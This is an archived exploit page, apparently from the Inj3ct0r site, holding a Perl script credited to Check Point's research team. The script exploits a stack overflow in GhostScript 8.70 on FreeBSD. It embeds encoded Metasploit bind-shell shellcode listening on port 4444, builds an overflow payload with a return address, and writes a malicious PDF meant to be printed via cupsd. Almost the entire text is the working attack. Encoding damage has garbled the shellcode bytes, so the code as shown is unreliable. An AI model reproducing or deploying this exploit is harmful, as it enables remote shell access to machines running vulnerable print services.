<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>GhostScript PostScript File Stack Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
GhostScript PostScript File Stack Overflow Exploit
==================================================

##########################################################################
# Check Point Software Technologies – Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco – &lt;rbranco *noSPAM* checkpoint.com&gt; #
# #
# GhostScript Stack Overflow #
# #
##########################################################################

# bsd/x86/shell_bind_tcp – 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $buf =
&quot;x54×5axdaxd1xd9×72xf4×5ax4ax4ax4ax4ax4ax43&quot; .
&quot;x43×43x43×43x43×52x59×56x54×58x33×30x56×58&quot; .
&quot;x34×41x50×30x41×33x48×48x30×41x30×30x41×42&quot; .
&quot;x41×41x42×54x41×41x51×32x41×42x32×42x42×30&quot; .
&quot;x42×42x58×50x38×41x43×4ax4ax49×50x31×49x50&quot; .
&quot;x46×30x45×38x4bx4fx44×42x42×31x51×4cx4dx59&quot; .
&quot;x4bx57×50x50×43x5ax45×51x42×4ax44×42x42×4a&quot; .
&quot;x44×50x4ex50×45x31×48x4dx4bx30×51x47×46x30&quot; .
&quot;x46×30x43×5ax45×38x51×48x48×4dx4bx30×4dx59&quot; .
&quot;x51×57x4ax4cx48×30x43×5ax48×4dx4dx50×4ex50&quot; .
&quot;x45×4ex48×4dx4dx50×50x50×50x50×43x5ax51×4a&quot; .
&quot;x50×58x48×4dx4dx50×4bx4fx50×4fx4ax44×43x49&quot; .
&quot;x4bx46×46x30×42x48×46x4fx46×4fx44×33x42×48&quot; .
&quot;x43×58x46×4fx43×52x45×39x42×4ex4bx39×4bx53&quot; .
&quot;x46×30x46×34x50×53x50×50x48×30x47×4bx48×4d&quot; .
&quot;x4dx50×41x41&quot;;

$pkt = &quot;e!PS&quot;.
&quot;A&quot; x 500 . &quot;00001111222233334444555556666777788889999aaa&quot;.
&quot;x40xd9xbfxbf&quot;. #Shellcode Addr
&quot;bccccddd&quot;.
&quot;xefxbexbfxbf&quot;.
&quot;ffff&quot;.
&quot;xffxbf&quot; x 100 .
&quot;C&quot; x (1200 – length($buf)) . $buf . &quot;Z&quot; x 100;

print STDERR &quot;Check Point Vulnerability Discovery Team (VDT)n&quot;;
print STDERR &quot;GhostScript 8.70 exploit for FreeBSD 8.0!n&quot;;
print STDERR &quot;Rodrigo Rubira Branco (BSDaemon)n&quot;;

print STDERR &quot;nCreating evil pdf …&quot;;

open(F,&quot;&gt;crash.pdf&quot;);

print F $pkt;

close(F);

print STDERR &quot; d0ne!n&quot;;
print &quot;Now print it via cupsd!n&quot;;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-18]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13394